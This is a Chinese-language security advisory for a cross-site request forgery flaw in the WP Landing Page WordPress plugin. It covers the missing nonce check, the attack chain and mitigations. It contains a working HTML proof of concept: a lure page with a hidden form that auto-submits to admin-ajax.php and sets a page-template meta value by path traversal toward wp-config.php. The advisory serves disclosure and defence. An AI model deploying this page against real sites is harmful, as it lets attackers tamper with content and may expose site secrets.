CVE-2025-13629 WordPress WP Landing Page插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13629

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WP Landing Page plugin for WordPress

漏洞概述

CVE-2025-13629是WordPress WP Landing Page插件中的一个跨站请求伪造(CSRF)安全漏洞。该插件是用于创建WordPress登录页面的工具，在0.9.3及以下所有版本中存在严重的安全缺陷。漏洞的根本原因在于wplp_api_update_text函数缺少nonce验证机制，这使得攻击者能够利用社工手段诱导已登录的管理员用户访问恶意构造的链接，从而在不知情的情况下更新任意文章元数据(meta data)。由于该漏洞不需要认证即可发起攻击（需要管理员交互），攻击者可以绕过身份验证机制执行未授权的操作。此漏洞的CVSS评分为4.3，属于中等严重级别，主要影响WordPress网站的完整性和数据安全性。

技术细节

该漏洞存在于WP Landing Page插件的wplp_api_update_text函数中，该函数负责处理文章元数据的更新请求。问题关键在于函数实现时缺少WordPress的nonce验证机制。WordPress的nonce机制是防止CSRF攻击的核心安全措施，通过验证请求来源的合法性来确保操作是由真实用户发起的。由于缺少此验证，攻击者可以构造一个恶意请求，诱骗已登录的管理员用户访问。当管理员访问攻击者精心设计的页面时，浏览器会自动向目标WordPress站点发送请求，由于管理员已经登录，请求会携带有效的会话cookie，服务器会认为这是合法的管理员操作，从而执行wplp_api_update_text函数更新指定的文章元数据。攻击者可以通过此方式修改任意文章的meta信息，可能导致网站内容被篡改、SEO优化被破坏或其他恶意目的。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意表单的网页，该表单指向目标WordPress站点的wplp_api_update_text AJAX端点

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱导WordPress管理员访问恶意网页

STEP 3

步骤3

管理员浏览器自动提交恶意表单请求，由于管理员已登录，请求携带有效会话cookie

STEP 4

步骤4

目标WordPress站点收到请求，wplp_api_update_text函数因缺少nonce验证而执行更新操作

STEP 5

步骤5

攻击者成功修改目标文章的元数据，可能导致内容篡改或进一步的攻击利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13629 -->
<!-- This PoC demonstrates how an attacker can trick a WordPress admin -->
<!-- into updating arbitrary post meta via a forged request -->

<!DOCTYPE html>
<html>
<head>
    <title>WP Landing Page CSRF Attack</title>
</head>
<body>
    <h1>Click here for a free gift!</h1>
    <!-- Hidden form that auto-submits -->
    <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST">
        <!-- wplp_api_update_text action -->
        <input type="hidden" name="action" value="wplp_api_update_text">
        <!-- Target post ID to modify -->
        <input type="hidden" name="post_id" value="1">
        <!-- Malicious meta key -->
        <input type="hidden" name="meta_key" value="_wp_page_template">
        <!-- Malicious meta value -->
        <input type="hidden" name="meta_value" value="../../../wp-config.php">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you see this, the attack failed.</p>
</body>
</html>

影响范围

WP Landing Page plugin <= 0.9.3

防御指南

临时缓解措施

作为临时缓解措施，可以暂时禁用WP Landing Page插件直到官方发布安全更新。同时，网站管理员应加强对管理员账户的安全措施，包括使用强密码、启用双因素认证、定期审查管理员账户活动等。对于已遭受攻击的网站，应立即检查文章元数据是否被篡改，恢复被修改的数据，并排查是否存在其他被利用的迹象。